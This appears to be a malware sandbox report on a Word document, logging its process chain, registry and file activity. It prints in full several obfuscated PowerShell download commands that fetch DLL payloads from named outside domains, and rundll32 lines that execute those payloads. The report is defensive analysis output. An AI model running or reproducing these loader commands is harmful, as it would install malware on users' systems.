Source: C:\Windows\System32\cscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $Nanoc='JOOEX'.replace('JOO','I');sal OY $Nanoc;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://sharayuprakashan.com/90qJEVeD0VAw/ca.html'',''C:\ProgramData\www4.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX\|OY;
Source: C:\Windows\System32\cscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $Nanoc='JOOEX'.replace('JOO','I');sal OY $Nanoc;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://venturefiling.com/yP2brxfli/ca.html'',''C:\ProgramData\www5.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX\|OY;
Source: C:\Windows\System32\cscript.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c rundll32.exe C:\ProgramData\www1.dll,ldr
Source: C:\Windows\System32\cscript.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c rundll32.exe C:\ProgramData\www2.dll,ldr
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\www1.dll,ldr
Source: C:\Windows\System32\cscript.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c rundll32.exe C:\ProgramData\www3.dll,ldr
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\www2.dll,ldr
Source: C:\Windows\System32\cscript.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c rundll32.exe C:\ProgramData\www4.dll,ldr
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\www3.dll,ldr
Source: C:\Windows\System32\cscript.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c rundll32.exe C:\ProgramData\www5.dll,ldr
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\www4.dll,ldr
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\www5.dll,ldr
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\cmd.exe cmd /k cscript.exe C:\ProgramData\pin.vbs
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cscript.exe cscript.exe C:\ProgramData\pin.vbs
Source: C:\Windows\System32\cscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $Nano='JOOEX'.replace('JOO','I');sal OY $Nano;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://gvmedicine.com/c8lDPI7K/ca.html'',''C:\ProgramData\www1.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX\|OY;
Source: C:\Windows\System32\cscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $Nanoz='JOOEX'.replace('JOO','I');sal OY $Nanoz;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://scriptcaseblog.com.br/8KhqnNaE4UB/ca.html'',''C:\ProgramData\www2.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX\|OY;
Source: C:\Windows\System32\cscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $Nanox='JOOEX'.replace('JOO','I');sal OY $Nanox;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://srdm.in/0K6dTttd/ca.html'',''C:\ProgramData\www3.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX\|OY;
Source: C:\Windows\System32\cscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $Nanoc='JOOEX'.replace('JOO','I');sal OY $Nanoc;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://sharayuprakashan.com/90qJEVeD0VAw/ca.html'',''C:\ProgramData\www4.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX\|OY;
Source: C:\Windows\System32\cscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $Nanoc='JOOEX'.replace('JOO','I');sal OY $Nanoc;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://venturefiling.com/yP2brxfli/ca.html'',''C:\ProgramData\www5.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX\|OY;
Source: C:\Windows\System32\cscript.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c rundll32.exe C:\ProgramData\www1.dll,ldr
Source: C:\Windows\System32\cscript.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c rundll32.exe C:\ProgramData\www2.dll,ldr
Source: C:\Windows\System32\cscript.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c rundll32.exe C:\ProgramData\www3.dll,ldr
Source: C:\Windows\System32\cscript.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c rundll32.exe C:\ProgramData\www4.dll,ldr
Source: C:\Windows\System32\cscript.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c rundll32.exe C:\ProgramData\www5.dll,ldr
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\www1.dll,ldr
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\www2.dll,ldr
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\www3.dll,ldr
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\www4.dll,ldr
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\www5.dll,ldr

Source: C:\Windows\System32\cscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32

Source: diagram-884.doc

OLE indicator, Word Document stream: true

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$agram-884.doc

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRE159.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.expl.evad.winDOC@35/17@5/3

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\www1.dll,ldr

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Process created: C:\Windows\System32\cmd.exe cmd /k cscript.exe C:\ProgramData\pin.vbs

Source: powershell.exe, 00000005.00000002.459165390.000000001CBE0000.00000002.00020000.sdmp, rundll32.exe, 00000012.00000002.508566082.0000000001B70000.00000002.00020000.sdmp

Binary or memory string: .VBPud<_

Source: diagram-884.doc	OLE document summary: title field not present or empty
Source: diagram-884.doc	OLE document summary: edited time not present or 0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Window found: window name: SysTabControl32

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Automated click: OK
Source: C:\Windows\System32\rundll32.exe	Automated click: OK
Source: C:\Windows\System32\rundll32.exe	Automated click: OK
Source: C:\Windows\System32\rundll32.exe	Automated click: OK
Source: C:\Windows\System32\rundll32.exe	Automated click: OK
Source: C:\Windows\System32\rundll32.exe	Automated click: OK
Source: C:\Windows\System32\rundll32.exe	Automated click: OK
Source: C:\Windows\System32\rundll32.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
